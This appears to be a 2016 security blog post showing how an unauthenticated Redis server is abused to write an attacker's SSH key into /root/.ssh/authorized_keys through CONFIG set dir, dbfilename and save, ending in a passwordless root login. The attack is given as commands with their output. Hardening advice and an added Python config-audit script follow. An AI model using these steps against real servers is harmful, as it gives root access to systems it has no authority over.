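An intrusion via Redis persistence
2016/02/19 21:54 in Security
This abuses the bug that Redis persistence writes a file to disk and that Redis lets you choose both the location and the name of that file. If your Redis happens to hold a single key whose value is an SSH public key, and the persistence file name is set to "authorized_keys" with the directory set to "/root/.ssh/", then whoever holds the matching private key can log in as root without a password.
1. Generate the key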
[root@saltstack-node2~]# (echo -e "\n\n";cat .ssh/id_rsa.pub;echo "\n\n") >/tmp/foo.txt
[root@saltstack-node2~]# cat /tmp/foo.txt
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0rfmYdQvgw/fmrKMj2nRV5FMucTAlv+J49Yu2MRsC9v0ORkesquGShvM/KuIM0P4yMS/l5/N/AzC3X76QJm3XeckuZdpo7KhZGuWGb76n4LrDf1UekagYW7dmW9f2WXnRrxnhl64N3DOeH9A2mD/mRrNrrJ+yyVUjbG9fM+FzOU8mYf7rqvLzqO2ppHYpPj9T5sR8E4bZpYBCQT9JXlA1N3y48LUGUqE5AuUKYEc6wyJCvPxaPWa8Ss03+zaVyF7ly+dje+3sDF1n8DvwveLaXV8BPfGB5bVG4kEtIhiWmWR+ITnLyzLzle2292+BtgfOrKOopk8TlBIhjVzl1LOJQ== root@xxx.example.com
\n\n
2. Flush Redis
127.0.0.1:6379> FLUSHALL
OK
3. Write a key
[root@saltstack-node2~]# cat /tmp/foo.txt |redis-cli -x set pwn
OK
4. Change the configuration of the known Redis instance
127.0.0.1:6379> CONFIG set dir /root/.ssh
OK
127.0.0.1:6379> config set dbfilename "authorized_keys"
OK
127.0.0.1:6379> save
OK
127.0.0.1:6379> exit
5. Now you can log in
[root@saltstack-node2~]# ssh 192.168.81.129
The authenticity of host '192.168.81.129 (192.168.81.129)' can't be established.
RSA key fingerprint is 7d:c4:f0:37:1e:ba:da:90:56:8b:fa:ee:df:d0:3f:22.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.81.129' (RSA) to the list of known hosts.
Last login: Wed Nov 11 03:18:23 2015 from 192.168.81.1
[root@saltstack-node2~]#
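Preventive measures:
1. Do not start Redis as root or as any other user that can log in (run it with low privileges)
2. Change the configuration to require password authentication
requirepass password
3. Bind to an internal IP so the service is not reachable from outside
bind 192.168.0.5
4. Remove the Redis commands that can be used to break into the system
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ""
rename-command EVAL ""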
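A way to check a redis.conf against the four preventive measures above. This is an added example, not code from the original post; the function names, the `run_as_user` parameter and both sample configurations are constructed for illustration.

```python
import shlex

# Commands the post recommends disabling with rename-command.
RISKY_COMMANDS = ("FLUSHALL", "FLUSHDB", "CONFIG", "EVAL")

def parse_redis_conf(text):
    """Return a list of (directive, [args]) parsed from redis.conf text."""
    directives = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles quoted arguments such as ""
        directives.append((parts[0].lower(), parts[1:]))
    return directives

def audit(text, run_as_user):
    """Check a redis.conf against the four measures; return a list of findings."""
    conf = parse_redis_conf(text)
    findings = []
    # 1. Redis should not run as root.
    if run_as_user == "root":
        findings.append("runs as root")
    # 2. Password authentication must be configured with a non-empty value.
    if not any(d == "requirepass" and a and a[0] for d, a in conf):
        findings.append("requirepass not set")
    # 3. Must be bound to specific addresses, not to every interface.
    binds = [addr for d, a in conf if d == "bind" for addr in a]
    if not binds or any(b.lstrip("-") in ("0.0.0.0", "*", "::") for b in binds):
        findings.append("no bind directive or bound to all interfaces")
    # 4. Dangerous commands should be renamed or disabled.
    renamed = {a[0].upper() for d, a in conf if d == "rename-command" and len(a) == 2}
    for cmd in RISKY_COMMANDS:
        if cmd not in renamed:
            findings.append(f"{cmd} not renamed or disabled")
    return findings

# Constructed sample configurations (not taken from a real host).
WEAK = 'port 6379\nbind 0.0.0.0\ndir /var/lib/redis\n'
HARDENED = (
    'bind 192.168.0.5\nrequirepass "constructed-long-passphrase"\n'
    'rename-command FLUSHALL ""\nrename-command FLUSHDB ""\n'
    'rename-command CONFIG ""\nrename-command EVAL ""\n'
)

if __name__ == "__main__":
    print(audit(WEAK, "root"), audit(HARDENED, "redis"))
```

Pass the account the redis-server process actually runs under as `run_as_user`; the configuration file alone does not record it.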
An intrusion via Redis persistence http://new.nginxs.net/read.php/hello-world/
恩极客斯
2016/02/19 22:38